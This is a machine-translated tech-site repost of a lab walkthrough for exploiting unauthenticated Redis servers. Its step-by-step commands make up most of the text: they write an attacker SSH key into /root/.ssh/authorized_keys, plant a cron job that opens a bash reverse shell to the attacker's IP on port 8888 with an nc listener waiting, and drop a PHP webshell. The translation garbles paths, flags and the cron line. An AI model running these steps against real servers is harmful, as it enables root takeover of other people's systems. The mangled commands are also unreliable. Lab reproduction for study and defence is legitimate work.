Shulou(Shulou.com)05/31 Report--

This article is to share with you the content of an example analysis of redis vulnerability recurrence. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

A brief introduction to vulnerabilities what is redis

Similar to Memcached, it supports relatively more value types for storage, including string (string), list (linked list), set (set), zset (sorted set-ordered set), and hash (hash type). These data types support push/pop, add/remove, and take intersection union and difference sets, and richer operations, and these operations are atomic. On this basis, redis supports a variety of different sorting methods. Like memcached, data is cached in memory for efficiency. The difference is that redis will periodically write updated data to disk or modify operations to additional record files, and on this basis to achieve master-slave (master-slave) synchronization. Redis is a high-performance key-value database. The emergence of redis makes up for the deficiency of key/value storage such as memcached to a great extent, and can play a good complementary role to relational database in partial situations. It provides clients such as Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang, which is easy to use.

Redis unauthorized access vulnerability

By default, redis is bound to 0.0.0.0 Redis 6379. If relevant policies are not adopted, such as adding firewall rules to avoid ip access from other untrusted sources, this will expose the Redis service to the public network. If password authentication is not set (usually empty), it will cause any user to access Redis and read Redis data without authorization if they can access the target server. Without authorized access to Redis, an attacker can write to a file using the config command provided by Redis itself.

The conditions for the occurrence of vulnerabilities are as follows:

(1) redis is bound to 0.0.0.0 6379, and no firewall rules are added to avoid ip access from other untrusted sources and other security policies are directly exposed on the public network; (2) password authentication is not set (usually empty), so you can log in to the redis service remotely without a password.

This reappearance is mainly as follows:

1. Redis runs as root, writes the SSH public key file to the root account, and logs in to the victim server directly through SSH. Write the file to a periodic scheduled task, and then accept the rebound shell3. If you set up a web server, write to webshell and control the server (here, because it is a self-built test environment, the files are only written to the / tmp directory, and the real situation needs to be modified)

Prepare the environment:

Attack aircraft (kali): 192.168.163.131 (you need to build your own redis-cli, which is the same as the server-side construction steps) Target aircraft (centos): 192.168.163.132

2. Build the environment (1) download the redis package

Wget http://download.redis.io/releases/redis-2.8.17.tar.gz

(2) put the compressed package into the specified path and enter the specified path cp redis-2.8.17.tar.gz / root/Desktop/redis/redis-2.8.17.tar.gzcd redis

(3) decompress the package, enter the specified path redis-2.8.17, and install tar xzf redis-2.8.17.tar.gzcd redis-2.8.17make

(4) go to the src path (5) copy redis-server and redis-cli to the / usr/bin directory, and then start the redis server directly and copy the redis.conf under the redis-2.8.17 directory to / etc cp redis-server / usr/bincp redis-cli / usr/bincp redis.conf / etc/redis.conf (6) start the service redis-server / etc/redis.conf

3. Vulnerability recurrence 3.1 using "public and private key" authentication to obtain root authority

(1) unauthorized access to the connection (unable to connect)

Redis-cli-h 192.168.163.132

(2) because it is built locally, port 6379 is not open to the public. For convenience, turn off the firewall of the server (target) directly.

/ etc/init.d/iptables stop

(3) kali attack plane is not authorized to access the connection.

Redis-cli-h 192.168.163.132keys *

(4) generate ssh public key and private key in the attack machine, and the password is set to empty:

Ssh-keygen-t rsa

(5) enter the .ssh directory and save the generated public key to 1.txt:

Cd / root/.ssh (echo-e "\ n\ n"; cat id_rsa.pub; echo-e "\ n\ n") > 1.txt

(6) write the public key 1.txt that saves the ssh to the redis (use the redis-cli-h ip command to connect the target and write the file):

Cat 1.txt | redis-cli-h 192.168.163.132-x set crack

(7) and use the CONFIG GET dir command to get the path of the redis backup:

CONFIG GET dir

(8) change the redis backup path to the ssh public key storage directory (generally default is / root/.ssh), and modify the name of the uploaded public key file to authorized_keys

Config set dir / root/.sshCONFIG SET dbfilename authorized_keys

(9) check whether the change is successful (check if there is an authorized_keys file), save and exit if there is no problem, and then successfully write the ssh public key to the target:

CONFIG GET dbfilenamesave

(10) check that the server has successfully written

(11) the attack plane successfully logged in to the server

Ssh-I id_rsa root@192.168.163.132

3.2 using crontab to rebound shell

In the case of sufficient permissions, use redis to write files to periodically scheduled task execution. (1) listen to designated ports in kali attack plane

Nc-lvnp 8888

(2) write files to the server

Set xxx "\ n\ nCompact 1 * / bin/bash-I > & / dev/tcp/192.168.163.131/8888 0 > & 1\ n\ n" config set dir / var/spool/cronconfig set dbfilename rootsave

(3) check the writes on the server side

(4) the Kali attack plane can be connected (got the rebound shell)

3.3Writing webshell

Because it is a self-built test environment, the file is only written to the / tmp directory. The real situation needs to be modified. Write the file to the web path (1) and write the file to the / tmp directory.

Config set dir / tmpconfig set dbfilename shell.phpset webshell "" save

(2) View the server

Note: when writing to webshell, you can use:

Set x "\ r\ n\ n"

\ r\ n\ r\ nrepresents a new line. Files written with redis will carry some version information, which may not be executed if the line is not wrapped.

Thank you for reading! This is the end of this article on "sample Analysis of redis vulnerability recurrence". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, you can share it for more people to see!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.